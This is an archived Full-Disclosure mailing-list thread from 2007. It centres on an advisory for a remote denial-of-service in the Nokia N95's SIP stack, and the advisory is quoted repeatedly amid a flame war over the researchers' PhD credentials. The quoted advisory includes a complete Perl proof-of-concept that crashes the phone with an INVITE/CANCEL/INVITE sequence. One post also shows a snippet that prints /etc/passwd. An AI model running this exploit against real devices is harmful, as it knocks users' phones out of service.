http://perldoc.perl.org/functions/my.html

if you understood  perl you would see that this line shows your complete
lack of ability as $text could be declared as its used in the loop

to demonstrate such amazing techniques such as declaring variables properly
i will demonstrate this code

die ($!) unless open  my $file,'<',"/etc/passwd";
my @b = <$file>;

while(my $a = shift @b){
        print $a;
}

notice the "my $a" ... please take a few minutes to reflect on  this code as
your fragile phd minds can only handle so much but soon it will come to you


> while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
>
from perlretut ( http://perldoc.perl.org/perlretut.html )

"The sense of the match can be reversed by using !~ operator:

    print <http://perldoc.perl.org/functions/print.html> "It doesn't
match\n" if "Hello World" !~ /World/;"

Understanding that you do not know how to code i will make it easier for
you:

 "while ($text !~ /^SIP\/2.0 100(.\r\n)*/ ){"
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/b4cbc0a7/attachment.html 

From dudevanwinkle at gmail.com  Wed Dec  5 20:00:14 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Wed, 5 Dec 2007 15:00:14 -0500
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow
	today?
In-Reply-To: <18D45F1BCFBA494D87CE4CAFE370C650C52397@email.intranet.middlesexcc.edu>
References: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>
	<18D45F1BCFBA494D87CE4CAFE370C650C52397@email.intranet.middlesexcc.edu>
Message-ID: <e024ccca0712051200k76bc7bfh2d74dadc554e998b@mail.gmail.com>

On Dec 4, 2007 8:27 AM, Maloney, Michael <MMaloney at middlesexcc.edu> wrote:
> I've noticed a 30K increase per day in traffic..


I was finally able to do the numbers:

We do 1,000,000 emails a day

We did 1.3 million that day..

Something must have happened...

-JP



From state at loria.fr  Wed Dec  5 19:57:13 2007
From: state at loria.fr (state at loria.fr)
Date: Wed,  5 Dec 2007 20:57:13 +0100
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP
	Stack
In-Reply-To: <e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>
References: <003c01c83760$faac19b0$5e0c5198@Crocodile>
	<e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>
Message-ID: <1196884633.47570299ee835@www.loria.fr>

hi Reepex,

I do not understand why are frustrated about a computer science degree. Maybe,
someone got dropped out of a degree programm and some psychological trauma gets
 activated when seeing a Ph.D?

If you like it or not, in order to get a computer science degree, you will have
to take classes, and  most classes are taught by Ph.Ds.

I will not argue with you on why I use the Ph.D in my signature, but if you
really want to know, look at our research papers published in academic
journals/conferences. (If you do not find them, I can send them to you).
If you will ever understand the contents, then you will understand what are our
credentials..:) This will probably never happen.

At least, I use a signature and a real name and do not hide behind a gmail
account.

Meanwhile try yourself to find at least one vulnerability and enjoy Perl
programming, it seemes your computer science skills are somehow in this area :)


Greetings




RS


Selon reepex <reepex at gmail.com>:

> So almighty Phd what is your thesis exactly?
>
> To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
> to exploit DoS conditions'
>
> does this properly summarize your phd credentials?
>
> I guess  you could tack on 'after writing the crappy scripts, flood mailing
> lists with our crap, and get made fun of'
>
> I am sure you will serve the academic community great one day when teach
> "hacking" classes revolving around the latest editions of hacking exposed
>
>
>
> On Dec 5, 2007 11:05 AM, Radu State <State at loria.fr> wrote:
>
> >  Nokia N95 cellphone remote DoS using the SIP Stack
> >
> >
> >
> > Severity:
> >
> > High ? Denial of Service
> >
> >
> >
> > Hardware:
> >
> > Nokia N95
> >
> >
> >
> > Firmware:
> >
> > Tested version: Nokia RM-159 V 12.0.013
> >
> >
> >
> > Notification:
> >
> > Vulnerability found: 11 September 2007
> >
> > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> > Security Support: 19 September 2007 / None reply
> >
> >
> >
> > Vulnerability Synopsis:
> >
> > If the device has the SIP Phone client activated, a sequence of SIP
> > messages turn the device in an inconsistent state where the user is not
> able
> > to operate it anymore until it reboots.
> >
> >
> >
> > The sequence of messages consists in 2 different SIP Dialogs where the
> > first initiates an INVITE transaction but immediately closes it (in an
> > anticipated manner). While, the second transaction initiates a normal
> INVITE
> > transaction that trigger the vulnerability of the target.
> >
> >
> >
> > The sequence of messages is illustrated below.
> >
> >
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> >
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> >
> > X ------------------------- CANCEL -----------------------> Nokiav12
> >
> > X <----------------- OK (to the Cancel) ------------------- Nokiav12
> >
> >  X <---------------- 487 Request Terminated ---------------- Nokiav12
> >
> >
> >
> > --------New Dialog--------
> >
> >
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> >
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> >
> > X <---------------------- 180 Trying ---------------------- Nokiav12
> >
> >
> >
> > ---- The device does not work properly anymore ----
> >
> >
> >
> > Impact:
> >
> > A remote entity can take down all the services of the cell phone
> >
> >
> >
> > Resolution:
> >
> > As we did not get any proper reply from Nokia about the subject, the best
> > way will be to disable the SIP Client
> >
> >
> >
> > Credits:
> >
> > Humberto J. Abdelnur (Ph.D Student)
> >
> > Radu State (Ph.D)
> >
> > Olivier Festor (Ph.D)
> >
> >
> >
> > This vulnerability was identified by the Madynes research team at INRIA
> > Lorraine, using KiF the Madynes VoIP fuzzer.
> >
> > http://madynes.loria.fr/
> >
> >
> >
> >
> >
> > Proof of Concept:
> >
> >
> >
> > A perl script (nokiav12.pl) is attached to this mail. Before launching
> >
> > it, the SIP phone has to be initialed in the target device
> >
> >
> >
> > Command:
> >
> > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
> >
> >
> >
> > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
> >
> >
> >
> >
> >
> > #!/usr/bin/perl
> >
> >
> >
> > ##################################################
> >
> > # Vulnerabily discovered using KiF ~ Kiph #
> >
> > # #
> >
> > # Authors: #
> >
> > # Humberto J. Abdelnur (Ph.D Student) #
> >
> > # Radu State (Ph.D) #
> >
> > # Olivier Festor (Ph.D) #
> >
> > # #
> >
> > # Madynes Team, LORIA - INRIA Lorraine #
> >
> > # http://madynes.loria.fr #
> >
> > ##################################################
> >
> >
> >
> > use IO::Socket::INET;
> >
> > use String::Random;
> >
> >
> >
> > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
> >
> > unless ($ARGV[3]);
> >
> >
> >
> > $targetUser = $ARGV[1];
> >
> > $targetIP = $ARGV[0];
> >
> >
> >
> > $attackerUser = $ARGV[3];
> >
> > $attackerIP= $ARGV[2];
> >
> >
> >
> > $socket=new IO::Socket::INET->new(
> >
> > Proto=>'udp',
> >
> > PeerPort=>5060,
> >
> > PeerAddr=>$targetIP,
> >
> > LocalPort=>5060);
> >
> >
> >
> > $foo = new String::Random;
> >
> > $callid= $foo->randpattern("CCccnCn");
> >
> > $cseq = $foo->randregex('\d\d\d\d');
> >
> >
> >
> > $sdp = "v=0\r
> >
> > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> >
> > s=-\r
> >
> > c=IN IP4 $attackerIP\r
> >
> > t=0 0\r
> >
> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> >
> > a=sendrecv\r
> >
> > a=ptime:20\r
> >
> > a=maxptime:200\r
> >
> > a=fmtp:96 mode-change-neighbor=1\r
> >
> > a=fmtp:18 annexb=no\r
> >
> > a=fmtp:98 0-15\r
> >
> > a=rtpmap:96 AMR/8000/1\r
> >
> > a=rtpmap:0 PCMU/8000/1\r
> >
> > a=rtpmap:8 PCMA/8000/1\r
> >
> > a=rtpmap:97 iLBC/8000/1\r
> >
> > a=rtpmap:18 G729/8000/1\r
> >
> > a=rtpmap:98 telephone-event/8000/1\r
> >
> > a=rtpmap:13 CN/8000/1\r
> >
> > ";
> >
> >
> >
> > $sdplen= length $sdp;
> >
> >
> >
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> >
> > To: <sip:$targetUser\@$targetIP>\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq INVITE\r
> >
> > Max-Forwards: 70\r
> >
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> >
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> >
> > MESSAGE\r
> >
> > Content-Type: application/sdp\r
> >
> > Content-Length: $sdplen\r
> >
> > \r
> >
> > $sdp";
> >
> > $socket->send($msg);
> >
> > $text = '';
> >
> > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
> >
> > $socket->recv($text,1024,0);
> >
> > }
> >
> >
> >
> > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> >
> > To: <sip:$targetUser\@$targetIP>;tag=1\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq CANCEL\r
> >
> > Max-Forwards: 70\r
> >
> > Content-Length: 0\r
> >
> > \r
> >
> > ";
> >
> > $socket->send($msg);
> >
> > time.sleep(1);
> >
> > $callid= $foo->randpattern("CCccnCn");
> >
> > $cseq = $foo->randregex('\d\d\d\d');
> >
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> >
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> >
> > From: <sip:$attackerUser\@$attackerIP>;tag=2\r
> >
> > To: <sip:$targetUser\@$targetIP>\r
> >
> > Call-ID: $callid\@$attackerIP\r
> >
> > CSeq: $cseq INVITE\r
> >
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> >
> > Max-Forwards: 70\r
> >
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> >
> > MESSAGE\r
> >
> > Content-Type: application/sdp\r
> >
> > Content-Length: $sdplen\r
> >
> > \r
> >
> > $sdp";
> >
> > $socket->send($msg);
> >
> >
> >
> >
> >
> >
> >
> > No virus found in this outgoing message.
> > Checked by AVG Free Edition.
> > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> > 04/12/2007 19:31
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>




From reepex at gmail.com  Wed Dec  5 20:14:59 2007
From: reepex at gmail.com (reepex)
Date: Wed, 5 Dec 2007 14:14:59 -0600
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP
	Stack
In-Reply-To: <1196884633.47570299ee835@www.loria.fr>
References: <003c01c83760$faac19b0$5e0c5198@Crocodile>
	<e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>
	<1196884633.47570299ee835@www.loria.fr>
Message-ID: <e9d9d4020712051214m6a3032dqdc7dade4f6f0b7b5@mail.gmail.com>

http://hal.inria.fr/index.php?view_this_doc=inria-00172056&extended_view=1&version=&halsid=5561bd637e62791f1744a158d907343a

Could you please send me this document so i can learn from you how to nmap?
I would very much appreciate reading this paper so I can learn the basics of
a high level pen test.

http://hal.inria.fr/inria-00168415/fr/

I would also love this paper. Based on the times you mention the word
"model" and "proven" it seems your product must be better  then selinux
itself.

The rest of your papers were modeled around mobile ad-hoc networks and "key
managment in blah blah" which are areas generally reserved for academics who
cannot publish anything useful so it seems appropriate that the bulk of your
publications are in this field.




On Dec 5, 2007 1:57 PM, <state at loria.fr> wrote:

> hi Reepex,
>
> I do not understand why are frustrated about a computer science degree.
> Maybe,
> someone got dropped out of a degree programm and some psychological trauma
> gets
>  activated when seeing a Ph.D?
>
> If you like it or not, in order to get a computer science degree, you will
> have
> to take classes, and  most classes are taught by Ph.Ds.
>
> I will not argue with you on why I use the Ph.D in my signature, but if
> you
> really want to know, look at our research papers published in academic
> journals/conferences. (If you do not find them, I can send them to you).
> If you will ever understand the contents, then you will understand what
> are our
> credentials..:) This will probably never happen.
>
> At least, I use a signature and a real name and do not hide behind a gmail
> account.
>
> Meanwhile try yourself to find at least one vulnerability and enjoy Perl
> programming, it seemes your computer science skills are somehow in this
> area :)
>
>
> Greetings
>
>
>
>
> RS
>
>
> Selon reepex <reepex at gmail.com>:
>
> > So almighty Phd what is your thesis exactly?
> >
> > To me it seems to be  'how to run a fuzzer then write crappy perl
>  scripts
> > to exploit DoS conditions'
> >
> > does this properly summarize your phd credentials?
> >
> > I guess  you could tack on 'after writing the crappy scripts, flood
> mailing
> > lists with our crap, and get made fun of'
> >
> > I am sure you will serve the academic community great one day when teach
> > "hacking" classes revolving around the latest editions of hacking
> exposed
> >
> >
> >
> > On Dec 5, 2007 11:05 AM, Radu State <State at loria.fr> wrote:
> >
> > >  Nokia N95 cellphone remote DoS using the SIP Stack
> > >
> > >
> > >
> > > Severity:
> > >
> > > High ? Denial of Service
> > >
> > >
> > >
> > > Hardware:
> > >
> > > Nokia N95
> > >
> > >
> > >
> > > Firmware:
> > >
> > > Tested version: Nokia RM-159 V 12.0.013
> > >
> > >
> > >
> > > Notification:
> > >
> > > Vulnerability found: 11 September 2007
> > >
> > > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> > > Security Support: 19 September 2007 / None reply
> > >
> > >
> > >
> > > Vulnerability Synopsis:
> > >
> > > If the device has the SIP Phone client activated, a sequence of SIP
> > > messages turn the device in an inconsistent state where the user is
> not
> > able
> > > to operate it anymore until it reboots.
> > >
> > >
> > >
> > > The sequence of messages consists in 2 different SIP Dialogs where the
> > > first initiates an INVITE transaction but immediately closes it (in an
> > > anticipated manner). While, the second transaction initiates a normal
> > INVITE
> > > transaction that trigger the vulnerability of the target.
> > >
> > >
> > >
> > > The sequence of messages is illustrated below.
> > >
> > >
> > >
> > > X ------------------------- INVITE -----------------------> Nokiav12
> > >
> > > X <---------------------- 100 Trying ---------------------- Nokiav12
> > >
> > > X ------------------------- CANCEL -----------------------> Nokiav12
> > >
> > > X <----------------- OK (to the Cancel) ------------------- Nokiav12
> > >
> > >  X <---------------- 487 Request Terminated ---------------- Nokiav12
> > >
> > >
> > >
> > > --------New Dialog--------
> > >
> > >
> > >
> > > X ------------------------- INVITE -----------------------> Nokiav12
> > >
> > > X <---------------------- 100 Trying ---------------------- Nokiav12
> > >
> > > X <---------------------- 180 Trying ---------------------- Nokiav12
> > >
> > >
> > >
> > > ---- The device does not work properly anymore ----
> > >
> > >
> > >
> > > Impact:
> > >
> > > A remote entity can take down all the services of the cell phone
> > >
> > >
> > >
> > > Resolution:
> > >
> > > As we did not get any proper reply from Nokia about the subject, the
> best
> > > way will be to disable the SIP Client
> > >
> > >
> > >
> > > Credits:
> > >
> > > Humberto J. Abdelnur (Ph.D Student)
> > >
> > > Radu State (Ph.D)
> > >
> > > Olivier Festor (Ph.D)
> > >
> > >
> > >
> > > This vulnerability was identified by the Madynes research team at
> INRIA
> > > Lorraine, using KiF the Madynes VoIP fuzzer.
> > >
> > > http://madynes.loria.fr/
> > >
> > >
> > >
> > >
> > >
> > > Proof of Concept:
> > >
> > >
> > >
> > > A perl script (nokiav12.pl) is attached to this mail. Before launching
> > >
> > > it, the SIP phone has to be initialed in the target device
> > >
> > >
> > >
> > > Command:
> > >
> > > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
> > >
> > >
> > >
> > > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
> > >
> > >
> > >
> > >
> > >
> > > #!/usr/bin/perl
> > >
> > >
> > >
> > > ##################################################
> > >
> > > # Vulnerabily discovered using KiF ~ Kiph #
> > >
> > > # #
> > >
> > > # Authors: #
> > >
> > > # Humberto J. Abdelnur (Ph.D Student) #
> > >
> > > # Radu State (Ph.D) #
> > >
> > > # Olivier Festor (Ph.D) #
> > >
> > > # #
> > >
> > > # Madynes Team, LORIA - INRIA Lorraine #
> > >
> > > # http://madynes.loria.fr #
> > >
> > > ##################################################
> > >
> > >
> > >
> > > use IO::Socket::INET;
> > >
> > > use String::Random;
> > >
> > >
> > >
> > > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
> > >
> > > unless ($ARGV[3]);
> > >
> > >
> > >
> > > $targetUser = $ARGV[1];
> > >
> > > $targetIP = $ARGV[0];
> > >
> > >
> > >
> > > $attackerUser = $ARGV[3];
> > >
> > > $attackerIP= $ARGV[2];
> > >
> > >
> > >
> > > $socket=new IO::Socket::INET->new(
> > >
> > > Proto=>'udp',
> > >
> > > PeerPort=>5060,
> > >
> > > PeerAddr=>$targetIP,
> > >
> > > LocalPort=>5060);
> > >
> > >
> > >
> > > $foo = new String::Random;
> > >
> > > $callid= $foo->randpattern("CCccnCn");
> > >
> > > $cseq = $foo->randregex('\d\d\d\d');
> > >
> > >
> > >
> > > $sdp = "v=0\r
> > >
> > > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> > >
> > > s=-\r
> > >
> > > c=IN IP4 $attackerIP\r
> > >
> > > t=0 0\r
> > >
> > > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> > >
> > > a=sendrecv\r
> > >
> > > a=ptime:20\r
> > >
> > > a=maxptime:200\r
> > >
> > > a=fmtp:96 mode-change-neighbor=1\r
> > >
> > > a=fmtp:18 annexb=no\r
> > >
> > > a=fmtp:98 0-15\r
> > >
> > > a=rtpmap:96 AMR/8000/1\r
> > >
> > > a=rtpmap:0 PCMU/8000/1\r
> > >
> > > a=rtpmap:8 PCMA/8000/1\r
> > >
> > > a=rtpmap:97 iLBC/8000/1\r
> > >
> > > a=rtpmap:18 G729/8000/1\r
> > >
> > > a=rtpmap:98 telephone-event/8000/1\r
> > >
> > > a=rtpmap:13 CN/8000/1\r
> > >
> > > ";
> > >
> > >
> > >
> > > $sdplen= length $sdp;
> > >
> > >
> > >
> > > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > >
> > > To: <sip:$targetUser\@$targetIP>\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq INVITE\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Contact: <sip:$attackerUser\@$attackerIP>\r
> > >
> > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> > >
> > > MESSAGE\r
> > >
> > > Content-Type: application/sdp\r
> > >
> > > Content-Length: $sdplen\r
> > >
> > > \r
> > >
> > > $sdp";
> > >
> > > $socket->send($msg);
> > >
> > > $text = '';
> > >
> > > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
> > >
> > > $socket->recv($text,1024,0);
> > >
> > > }
> > >
> > >
> > >
> > > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > >
> > > To: <sip:$targetUser\@$targetIP>;tag=1\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq CANCEL\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Content-Length: 0\r
> > >
> > > \r
> > >
> > > ";
> > >
> > > $socket->send($msg);
> > >
> > > time.sleep(1);
> > >
> > > $callid= $foo->randpattern("CCccnCn");
> > >
> > > $cseq = $foo->randregex('\d\d\d\d');
> > >
> > > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=2\r
> > >
> > > To: <sip:$targetUser\@$targetIP>\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq INVITE\r
> > >
> > > Contact: <sip:$attackerUser\@$attackerIP>\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> > >
> > > MESSAGE\r
> > >
> > > Content-Type: application/sdp\r
> > >
> > > Content-Length: $sdplen\r
> > >
> > > \r
> > >
> > > $sdp";
> > >
> > > $socket->send($msg);
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > No virus found in this outgoing message.
> > > Checked by AVG Free Edition.
> > > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> > > 04/12/2007 19:31
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/499ddce5/attachment.html 

From version5 at gmail.com  Wed Dec  5 22:10:15 2007
From: version5 at gmail.com (nnp)
Date: Wed, 5 Dec 2007 14:10:15 -0800
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP
	Stack
In-Reply-To: <1196884633.47570299ee835@www.loria.fr>
References: <003c01c83760$faac19b0$5e0c5198@Crocodile>
	<e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>
	<1196884633.47570299ee835@www.loria.fr>
Message-ID: <28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think you're missing his point. In fact I might be too but my take on it
is this.... you'd think two PhD's and a PhD student might be able to do
something a little more advanced than running a fuzzer and reporting DoS
conditions.

Do you guys even investigate the DoS to determine the root cause? If ye did
then that might be OK and considered PhD level. I would think that a PhD
level interpretation of this area might be for instance..... running a
fuzzer against a hardware phone and then getting some form of code
execution. Yes? No? Maybe? It looks to me like someone one of you guys built
a VoIP fuzzer (is it even a VoIP fuzzer or just SIP?) and for the remainder
of your doctoral studies you will be purchasing equipment and hitting the
'Fuzz' button.

As I said, if you're gonna be submitting this kind of stuff to every list
you can then at least investigate the root cause, maybe then it'll provide
some slightly more interesting reading and perhaps benefit your thesis.

nnp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7
addmL2c5Jm4LrlQvahnBrgY=
=YX4u
-----END PGP SIGNATURE-----
On Dec 5, 2007 11:57 AM, <state at loria.fr> wrote:

> hi Reepex,
>
> I do not understand why are frustrated about a computer science degree.
> Maybe,
> someone got dropped out of a degree programm and some psychological trauma
> gets
>  activated when seeing a Ph.D?
>
> If you like it or not, in order to get a computer science degree, you will
> have
> to take classes, and  most classes are taught by Ph.Ds.
>
> I will not argue with you on why I use the Ph.D in my signature, but if
> you
> really want to know, look at our research papers published in academic
> journals/conferences. (If you do not find them, I can send them to you).
> If you will ever understand the contents, then you will understand what
> are our
> credentials..:) This will probably never happen.
>
> At least, I use a signature and a real name and do not hide behind a gmail
> account.
>
> Meanwhile try yourself to find at least one vulnerability and enjoy Perl
> programming, it seemes your computer science skills are somehow in this
> area :)
>
>
> Greetings
>
>
>
>
> RS
>
>
> Selon reepex <reepex at gmail.com>:
>
> > So almighty Phd what is your thesis exactly?
> >
> > To me it seems to be  'how to run a fuzzer then write crappy perl
>  scripts
> > to exploit DoS conditions'
> >
> > does this properly summarize your phd credentials?
> >
> > I guess  you could tack on 'after writing the crappy scripts, flood
> mailing
> > lists with our crap, and get made fun of'
> >
> > I am sure you will serve the academic community great one day when teach
> > "hacking" classes revolving around the latest editions of hacking
> exposed
> >
> >
> >
> > On Dec 5, 2007 11:05 AM, Radu State <State at loria.fr> wrote:
> >
> > >  Nokia N95 cellphone remote DoS using the SIP Stack
> > >
> > >
> > >
> > > Severity:
> > >
> > > High ? Denial of Service
> > >
> > >
> > >
> > > Hardware:
> > >
> > > Nokia N95
> > >
> > >
> > >
> > > Firmware:
> > >
> > > Tested version: Nokia RM-159 V 12.0.013
> > >
> > >
> > >
> > > Notification:
> > >
> > > Vulnerability found: 11 September 2007
> > >
> > > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> > > Security Support: 19 September 2007 / None reply
> > >
> > >
> > >
> > > Vulnerability Synopsis:
> > >
> > > If the device has the SIP Phone client activated, a sequence of SIP
> > > messages turn the device in an inconsistent state where the user is
> not
> > able
> > > to operate it anymore until it reboots.
> > >
> > >
> > >
> > > The sequence of messages consists in 2 different SIP Dialogs where the
> > > first initiates an INVITE transaction but immediately closes it (in an
> > > anticipated manner). While, the second transaction initiates a normal
> > INVITE
> > > transaction that trigger the vulnerability of the target.
> > >
> > >
> > >
> > > The sequence of messages is illustrated below.
> > >
> > >
> > >
> > > X ------------------------- INVITE -----------------------> Nokiav12
> > >
> > > X <---------------------- 100 Trying ---------------------- Nokiav12
> > >
> > > X ------------------------- CANCEL -----------------------> Nokiav12
> > >
> > > X <----------------- OK (to the Cancel) ------------------- Nokiav12
> > >
> > >  X <---------------- 487 Request Terminated ---------------- Nokiav12
> > >
> > >
> > >
> > > --------New Dialog--------
> > >
> > >
> > >
> > > X ------------------------- INVITE -----------------------> Nokiav12
> > >
> > > X <---------------------- 100 Trying ---------------------- Nokiav12
> > >
> > > X <---------------------- 180 Trying ---------------------- Nokiav12
> > >
> > >
> > >
> > > ---- The device does not work properly anymore ----
> > >
> > >
> > >
> > > Impact:
> > >
> > > A remote entity can take down all the services of the cell phone
> > >
> > >
> > >
> > > Resolution:
> > >
> > > As we did not get any proper reply from Nokia about the subject, the
> best
> > > way will be to disable the SIP Client
> > >
> > >
> > >
> > > Credits:
> > >
> > > Humberto J. Abdelnur (Ph.D Student)
> > >
> > > Radu State (Ph.D)
> > >
> > > Olivier Festor (Ph.D)
> > >
> > >
> > >
> > > This vulnerability was identified by the Madynes research team at
> INRIA
> > > Lorraine, using KiF the Madynes VoIP fuzzer.
> > >
> > > http://madynes.loria.fr/
> > >
> > >
> > >
> > >
> > >
> > > Proof of Concept:
> > >
> > >
> > >
> > > A perl script (nokiav12.pl) is attached to this mail. Before launching
> > >
> > > it, the SIP phone has to be initialed in the target device
> > >
> > >
> > >
> > > Command:
> > >
> > > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
> > >
> > >
> > >
> > > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
> > >
> > >
> > >
> > >
> > >
> > > #!/usr/bin/perl
> > >
> > >
> > >
> > > ##################################################
> > >
> > > # Vulnerabily discovered using KiF ~ Kiph #
> > >
> > > # #
> > >
> > > # Authors: #
> > >
> > > # Humberto J. Abdelnur (Ph.D Student) #
> > >
> > > # Radu State (Ph.D) #
> > >
> > > # Olivier Festor (Ph.D) #
> > >
> > > # #
> > >
> > > # Madynes Team, LORIA - INRIA Lorraine #
> > >
> > > # http://madynes.loria.fr #
> > >
> > > ##################################################
> > >
> > >
> > >
> > > use IO::Socket::INET;
> > >
> > > use String::Random;
> > >
> > >
> > >
> > > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
> > >
> > > unless ($ARGV[3]);
> > >
> > >
> > >
> > > $targetUser = $ARGV[1];
> > >
> > > $targetIP = $ARGV[0];
> > >
> > >
> > >
> > > $attackerUser = $ARGV[3];
> > >
> > > $attackerIP= $ARGV[2];
> > >
> > >
> > >
> > > $socket=new IO::Socket::INET->new(
> > >
> > > Proto=>'udp',
> > >
> > > PeerPort=>5060,
> > >
> > > PeerAddr=>$targetIP,
> > >
> > > LocalPort=>5060);
> > >
> > >
> > >
> > > $foo = new String::Random;
> > >
> > > $callid= $foo->randpattern("CCccnCn");
> > >
> > > $cseq = $foo->randregex('\d\d\d\d');
> > >
> > >
> > >
> > > $sdp = "v=0\r
> > >
> > > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> > >
> > > s=-\r
> > >
> > > c=IN IP4 $attackerIP\r
> > >
> > > t=0 0\r
> > >
> > > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> > >
> > > a=sendrecv\r
> > >
> > > a=ptime:20\r
> > >
> > > a=maxptime:200\r
> > >
> > > a=fmtp:96 mode-change-neighbor=1\r
> > >
> > > a=fmtp:18 annexb=no\r
> > >
> > > a=fmtp:98 0-15\r
> > >
> > > a=rtpmap:96 AMR/8000/1\r
> > >
> > > a=rtpmap:0 PCMU/8000/1\r
> > >
> > > a=rtpmap:8 PCMA/8000/1\r
> > >
> > > a=rtpmap:97 iLBC/8000/1\r
> > >
> > > a=rtpmap:18 G729/8000/1\r
> > >
> > > a=rtpmap:98 telephone-event/8000/1\r
> > >
> > > a=rtpmap:13 CN/8000/1\r
> > >
> > > ";
> > >
> > >
> > >
> > > $sdplen= length $sdp;
> > >
> > >
> > >
> > > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > >
> > > To: <sip:$targetUser\@$targetIP>\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq INVITE\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Contact: <sip:$attackerUser\@$attackerIP>\r
> > >
